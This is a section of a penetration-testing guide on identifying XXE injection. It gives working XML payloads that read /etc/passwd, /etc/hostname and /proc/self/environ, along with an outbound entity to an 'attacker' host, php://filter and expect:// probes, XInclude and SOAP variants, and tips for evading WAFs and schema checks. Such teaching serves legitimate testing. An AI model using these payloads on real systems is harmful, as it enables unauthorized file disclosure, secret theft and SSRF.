Identifying
Three-step identification: find an XML input surface, confirm the parser resolves entities, then test external-entity resolution. The proof-of-life probe is a benign internal entity reflected in the response:
```text
# Step 1 - Spot XML by Content-Type, request body, or document-format upload

# Step 2 - Reflection probe (does the parser resolve entities at all?)
<!DOCTYPE foo [<!ENTITY test "PROOF_OF_LIFE">]>
<root><name>&test;</name></root>
# → If response contains "PROOF_OF_LIFE" where the entity was, internal entities resolve

# Step 3 - External-entity probe
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/hostname">]>
<root><name>&xxe;</name></root>
# → If response contains the hostname, XXE is fully exploitable

# Step 4 - Content-Type pivot for JSON-by-default APIs
curl -X POST -H 'Content-Type: application/xml' --data '<...>' http://target/api
```

Success indicator: a value you put in an entity declaration appears in the rendered response. Once that happens, file disclosure is straightforward.
Finding the XML surface
Direct indicators
Watch for these in HTTP traffic:
| Indicator | Where |
|---|---|
| `Content-Type: application/xml` | Request or response header |
| `Content-Type: text/xml` | Older convention; same meaning |
| `Content-Type: application/soap+xml` | SOAP API |
| `SOAPAction:` header | SOAP API |
| `<?xml version="1.0" ...?>` | First bytes of request/response body |
| `xmlns=` attributes | XML namespace declarations in body |
| `multipart/related` with XML parts | SOAP-with-attachments, SAML, WSDL responses |
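
When reviewing a large proxy history, the indicators above can be checked mechanically. The following is a minimal sketch, assuming each captured message is available as a header dictionary plus a body string; the function name `xml_indicators` and the returned labels are illustrative, not part of any tool.

```python
XML_CONTENT_TYPES = ("application/xml", "text/xml", "application/soap+xml")


def xml_indicators(headers: dict[str, str], body: str) -> list[str]:
    """Return the direct XML indicators present in one request or response."""
    found = []
    # Header names are case-insensitive, so normalise before looking them up.
    lowered = {name.lower(): value.lower() for name, value in headers.items()}
    content_type = lowered.get("content-type", "")
    for media_type in XML_CONTENT_TYPES:
        if content_type.startswith(media_type):
            found.append(f"Content-Type: {media_type}")
    if content_type.startswith("multipart/related"):
        found.append("multipart/related")
    if "soapaction" in lowered:
        found.append("SOAPAction header")
    # Body checks: XML declaration in the first bytes, namespace declarations anywhere.
    if body.lstrip().startswith("<?xml"):
        found.append("XML declaration")
    if "xmlns=" in body or "xmlns:" in body:
        found.append("xmlns attribute")
    return found
```

An empty list does not rule out an XML surface; it only means none of the direct indicators were present in that message.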
File-upload XML surfaces
Many file formats are XML under the hood:
| Format | Notes |
|---|---|
| SVG | Pure XML; any image-processing pipeline that “renders” SVG server-side parses it as XML |
| XML Office formats (`.docx`, `.xlsx`, `.pptx`) | ZIP archives containing `word/document.xml`, `xl/workbook.xml`, etc. Server-side text extractors and converters often parse these |
| ODF formats (`.odt`, `.ods`, `.odp`) | Same - ZIP of XML |
| EPUB | ZIP of XML |
| XML-based subtitle formats (`.ttml`, `.dfxp`) | Subtitle processors |
| GPX, KML | GPS / map data formats |
| PDF metadata / XMP | PDF embeds XML metadata; some PDF parsers parse it |
The SVG upload case is usually the highest-yield because SVG uploads are commonly accepted (profile pictures, document logos) and many ImageMagick / librsvg / Batik pipelines historically parsed XML with external entities enabled. See Limited uploads for the upload-side details.
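
For the ZIP-based formats, it helps to know which archive members are XML before deciding where a test payload could go. A small sketch using only the standard library; the helper name `xml_parts` is hypothetical, and treating `.rels` members as XML applies to the Office formats.

```python
import io
import zipfile


def xml_parts(document: bytes) -> list[str]:
    """List the XML members of a ZIP-based document (.docx, .odt, .epub, ...)."""
    with zipfile.ZipFile(io.BytesIO(document)) as archive:
        return sorted(
            name
            for name in archive.namelist()
            # .rels files are the XML relationship parts used by Office formats.
            if name.lower().endswith((".xml", ".rels"))
        )
```

Typical usage would be `xml_parts(open("sample.docx", "rb").read())`, where `sample.docx` stands in for any document the target accepts.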
JSON-to-XML content-negotiation pivot
Many “JSON APIs” accept XML as well, depending on the framework. The pattern:

```text
Server reads Content-Type → decides how to parse body
```

If the framework supports content negotiation (Spring, ASP.NET, some Flask configs, some Express plugins), sending the same logical request body but with `Content-Type: application/xml` may switch the parser. Try:

```bash
# Original JSON request
$ curl -X POST -H 'Content-Type: application/json' \
    -d '{"id": 1, "name": "test"}' \
    http://target/api/items

# Same logical content, XML-encoded
$ curl -X POST -H 'Content-Type: application/xml' \
    --data-binary @- http://target/api/items <<'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<request>
  <id>1</id>
  <name>test</name>
</request>
EOF
```

A 200 response (or anything other than 415 Unsupported Media Type) suggests the server is processing the XML body; compare it with the JSON response to confirm the values were actually read. Now the XXE probe applies.
Online converters like json-to-xml or jq -r with a small wrapper can turn complex JSON bodies into XML quickly for testing.
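
If no converter is at hand, the conversion is short enough to script. This is a rough sketch built on the standard library, assuming every JSON key is also a valid XML element name; the `request` root tag and the `item` tag for list entries are arbitrary choices, and the real endpoint may expect different names.

```python
import json
import xml.etree.ElementTree as ET


def json_to_xml(json_text: str, root_tag: str = "request") -> str:
    """Convert a JSON object into an equivalent XML document string."""

    def build(parent, value):
        if isinstance(value, dict):
            for key, child in value.items():
                build(ET.SubElement(parent, key), child)
        elif isinstance(value, list):
            # JSON arrays have no element name, so wrap each entry in <item>.
            for entry in value:
                build(ET.SubElement(parent, "item"), entry)
        elif isinstance(value, bool):
            parent.text = "true" if value else "false"
        elif value is not None:
            parent.text = str(value)

    root = ET.Element(root_tag)
    build(root, json.loads(json_text))
    return ET.tostring(root, encoding="unicode")
```

The output has no `<?xml ...?>` declaration; prepend one by hand if the endpoint requires it.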
GraphQL-to-XML
Some GraphQL endpoints support XML responses or XML mutation bodies via custom transports. Rare but worth probing if the engagement features a GraphQL endpoint that’s otherwise well-defended.
Hidden XML inside document submissions
A common pattern: a form accepts user input via JSON, but one field is “advanced settings as XML” that the back-end concatenates into a larger XML document and parses. Look for fields named `metadata`, `config`, `xml`, `settings`, `advanced`, or any free-form text field that gets stored alongside structured fields.
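
The field-name heuristic can be applied to a captured JSON body automatically. A minimal sketch, assuming the body is a JSON object; the helper name `xml_field_candidates` and the extra "value starts with `<`" check are illustrative additions, not an exhaustive rule.

```python
import json

CANDIDATE_NAMES = {"metadata", "config", "xml", "settings", "advanced"}


def xml_field_candidates(json_text: str) -> list[str]:
    """Return dotted paths of string fields that may be parsed as XML downstream."""
    hits = []

    def walk(value, path):
        if isinstance(value, dict):
            for key, child in value.items():
                walk(child, f"{path}.{key}" if path else key)
        elif isinstance(value, list):
            for index, child in enumerate(value):
                walk(child, f"{path}[{index}]")
        elif isinstance(value, str):
            # Flag by field name, or by a value that already looks like markup.
            name = path.rsplit(".", 1)[-1].lower()
            if name in CANDIDATE_NAMES or value.lstrip().startswith("<"):
                hits.append(path)

    walk(json.loads(json_text), "")
    return hits
```

Any path it returns is only a candidate; whether the back-end really parses that field as XML still has to be confirmed with the reflection probe.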
The reflection probe - step 1
Before testing external entities (which may be partially defended), confirm the parser resolves internal entities. This tests “does the XML parser process entity declarations at all”:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY test "PROOF_OF_LIFE">
]>
<root>
  <name>&test;</name>
</root>
```

Three possible responses:

- Response contains “PROOF_OF_LIFE” where `&test;` was. The parser resolves entities. Move to step 2.
- Response contains the literal string `&test;`. Entity resolution disabled at the application layer (the XML was treated as text). XXE probably won’t work here.
- Error / 500 / parse error. The DTD or entity declaration tripped strict-XML mode. Try variations:
  - Move the entity into the existing DOCTYPE if there is one
  - Use a different XML version or encoding declaration
  - Try without the `<?xml ...?>` declaration
The “PROOF_OF_LIFE” string can be anything - pick something obviously not in the app’s normal data so search-and-confirm is easy.
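
The three outcomes of the reflection probe can be told apart with a few string checks. The sketch below assumes you already have the status code and response body; the function name, the returned labels, and the check for an HTML-escaped `&amp;test;` are assumptions made for illustration.

```python
def classify_reflection(status: int, body: str,
                        marker: str = "PROOF_OF_LIFE",
                        entity: str = "test") -> str:
    """Map a reflection-probe response onto one of the outcomes described above."""
    if marker in body:
        return "resolved"  # entity value was substituted: parser resolves entities
    # The reference may come back raw or HTML-escaped when it was treated as text.
    if f"&{entity};" in body or f"&amp;{entity};" in body:
        return "literal"
    if status >= 400:
        return "error"  # try the DOCTYPE / declaration variations
    return "inconclusive"  # the chosen field is probably not reflected at all
```

An `inconclusive` result usually means the probe went into a field that is never echoed, which is a different problem from a hardened parser.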
Finding which field reflects
In a multi-field XML body, the entity reference has to go in a field that the application reads and renders back. Some fields are written to DB only and never echoed; those don’t help for response-reflection XXE.
Strategy: send a baseline request and note which submitted values appear in the response. The fields that come back are candidate injection points. Often:
- `name`, `title`, `subject` - usually reflected (common in forms and contact pages)
- `email`, `phone` - usually reflected (form validation echo)
- `message`, `body`, `notes` - sometimes reflected (preview functionality)
- `id`, `uuid` - sometimes reflected (success message confirms ID)
If no field reflects, see Blind exfil for the OOB approach.
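
The baseline comparison is easy to script once the submitted values and the response body are in hand. A minimal sketch; both helper names and the `zq` canary format are hypothetical, and fields with strict validation (email, phone) may reject canary values and need realistic ones instead.

```python
def canary_values(field_names: list[str]) -> dict[str, str]:
    """Give each field a unique, easy-to-search baseline value."""
    return {name: f"zq{index}{name}zq" for index, name in enumerate(field_names)}


def reflected_fields(submitted: dict[str, str], response_body: str) -> list[str]:
    """Return the fields whose submitted value appears in the response."""
    return [name for name, value in submitted.items()
            if value and value in response_body]
```

Short or common values can match by coincidence, which is why unique canaries give a cleaner answer than values like `test`.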
The external-entity probe - step 2
Once entity resolution is confirmed, test if external entities work:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<root>
  <name>&xxe;</name>
</root>
```

Targets to probe in order (each tests a different parser capability):
| Probe | Tests |
|---|---|
| `file:///etc/hostname` | Local file read on Linux; tiny, low-noise |
| `file:///c:/windows/win.ini` | Local file read on Windows |
| `http://attacker:8000/` | Outbound HTTP (proves SSRF) |
| `http://127.0.0.1:80/` | Localhost HTTP (also SSRF; sometimes only this works due to egress controls) |
| `php://filter/convert.base64-encode/resource=/etc/passwd` | PHP-specific filter (only works on PHP) |
| `expect://id` | PHP `expect://` wrapper (rare; if it works, it gives command execution) |
For each, observe whether the entity content appears in the response. The minimum useful confirmation is one file read.
What “file read” responses look like
For `file:///etc/passwd`:

```xml
<message>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...</message>
```

The full file content appears where the entity was referenced. If only part appears, the parser may be stopping at special characters: file content containing `<` or `&`, or bytes that are not legal XML characters, breaks well-formedness once it is substituted into the document. See File disclosure for the workarounds (CDATA, `php://filter/convert.base64-encode/`).
What “parser blocked” responses look like
| Symptom | Likely cause |
|---|---|
| Response empty where entity was | Parser resolved entity to null (file not readable, or external entities disabled) |
| 500 Internal Server Error | Parser error - could be permissions, missing file, or strict-XML rejecting the DOCTYPE |
| Response unchanged (entity name appears verbatim) | Parser doesn’t resolve entities at all, or app strips DOCTYPE before parsing |
| 400 / 415 | Application rejects the body - wrong Content-Type, schema validation, etc. |
Keep sending the probe even when it returns a 500 - the error message itself sometimes leaks useful information (file paths, parser library names, stack traces). See Blind exfil for error-based exploitation.
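
Error bodies can be skimmed for those leaks automatically. This is a rough sketch only: the parser-name list is a small illustrative sample, the path pattern matches Unix-style paths with at least two segments, and URL paths in the body will also match, so treat every hit as something to verify by eye.

```python
import re

# Illustrative sample of strings that identify common XML parsers in error output.
PARSER_NAMES = ("libxml2", "lxml", "Xerces", "SAXParseException",
                "XmlException", "DOMDocument", "SimpleXML")
# Unix-style path with two or more segments, e.g. /var/www/app/upload.xml
PATH_PATTERN = re.compile(r"(?:/[\w.\-]+){2,}")


def error_hints(body: str) -> dict[str, list[str]]:
    """Pull parser names and file-system paths out of an error response."""
    lowered = body.lower()
    return {
        "parsers": [name for name in PARSER_NAMES if name.lower() in lowered],
        "paths": sorted(set(PATH_PATTERN.findall(body))),
    }
```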
A worked identification walkthrough
A “Contact Us” form submits this XML:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<root>
  <name>John</name>
  <tel>555-1234</tel>
  <message>Hello</message>
</root>
```

Response:

```html
<h2>Thanks John, we received your message</h2>
```

Observations:

- `<name>` is reflected as “John” → injection point candidate
- `<tel>` and `<message>` don’t seem to appear in the visible response - could be DB-only
Step 1 - Reflection probe on <name>
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY test "PROOF_OF_LIFE">
]>
<root>
  <name>&test;</name>
  <tel>555-1234</tel>
  <message>Hello</message>
</root>
```

Response:

```html
<h2>Thanks PROOF_OF_LIFE, we received your message</h2>
```

✓ Internal entities resolve. Move to external.
Step 2 - External-entity probe
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<root>
  <name>&xxe;</name>
  <tel>555-1234</tel>
  <message>Hello</message>
</root>
```

Response:

```html
<h2>Thanks web-server-prod-01, we received your message</h2>
```

✓ External entities resolve. XXE is confirmed. Move on to File disclosure.
Edge cases
XML response, plain-text request
Some APIs accept JSON requests but return XML responses. The response is server-generated and not an attack surface. The request body is what matters - if it accepts XML, you’re in.
DTD-not-permitted strictness
Some parsers reject any DOCTYPE in the input as a defense (“DOCTYPE declarations not allowed”). Two paths:

- No DOCTYPE - try declaring entities inline if the parser supports it (rare). Standard XML only allows entity declarations inside a DOCTYPE, so this depends on non-conforming parser behavior.
- Find a different XML parser - if there’s an alternate endpoint (e.g., a `/v1/` vs `/v2/` of the API, or a different content-type that routes to a different parser), one of them may have looser config.
XInclude
XInclude is a separate XML feature (`<xi:include href="..."/>`) that imports another XML file’s content into the current document. When DOCTYPE is rejected but XInclude isn’t:

```xml
<?xml version="1.0"?>
<root xmlns:xi="http://www.w3.org/2001/XInclude">
  <name><xi:include href="file:///etc/passwd" parse="text"/></name>
</root>
```

This achieves the same file-read primitive without needing an entity declaration. Worth trying when DOCTYPE is blocked.
SOAP-wrapped XML
SOAP envelopes have their own structure but the XXE inside the body works the same:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <getUser>
      <username>&xxe;</username>
    </getUser>
  </soap:Body>
</soap:Envelope>
```

The DOCTYPE goes outside the SOAP envelope. The entity is referenced inside it. Most SOAP parsers honor entities the same way as raw XML parsers.
XML schema validation (XSD) as defense
Some apps validate input XML against a schema (XSD). The schema can restrict which elements are allowed, which might block your DOCTYPE addition. Bypasses:

- Submit XSD-conforming structure but add entities - the schema validates structure, not entity use. Add `<!ENTITY xxe ...>` and reference it where the schema allows string content.
- Look for alternate endpoints without schema validation - admin APIs and legacy endpoints often lack it.
Defensive smells to ignore (or test anyway)
When the app looks “defended,” test these specific patterns to find weaknesses:
| Apparent defense | Why it may not work |
|---|---|
| `Content-Type: application/json` enforced | Try `application/xml`, `text/xml`, multipart with XML part |
| “XXE prevention header” / WAF | Look for path variations (`/api/v1/` vs `/api/v2/`); WAFs commonly rate-limit by path |
| DOCTYPE not allowed | Try XInclude; try an external DTD pulled in via a parameter entity |
| External entities disabled at parser | Parameter entities sometimes still work; see Blind exfil |
| Application converts XML to JSON server-side | The conversion step itself often parses XML - XXE happens before the conversion |
Quick reference
| Task | Pattern |
|---|---|
| Spot XML surface | `Content-Type:` `application/xml`, `text/xml`, or `application/soap+xml`; `<?xml ...?>` in body |
| Pivot from JSON | -H 'Content-Type: application/xml' with XML-converted body |
| Reflection probe | <!DOCTYPE root [<!ENTITY test "PROOF">]> ... &test; |
| External-entity probe | <!ENTITY xxe SYSTEM "file:///etc/hostname"> ... &xxe; |
| Linux file targets | /etc/hostname, /etc/passwd, /etc/hosts, /proc/self/environ |
| Windows file targets | c:/windows/win.ini, c:/boot.ini, c:/inetpub/logs/... |
| HTTP outbound probe | <!ENTITY x SYSTEM "http://attacker:8000/"> |
| PHP filter probe | <!ENTITY x SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> |
| XInclude (DOCTYPE blocked) | <xi:include href="file:///..." parse="text"/> (with xmlns:xi="http://www.w3.org/2001/XInclude") |
| SOAP-wrapped XXE | DOCTYPE outside <soap:Envelope>; reference entity inside |
| Document-format pivot | Upload SVG / DOCX / XLSX with embedded XXE payload |
| If no reflection | See Blind exfil for OOB exfil |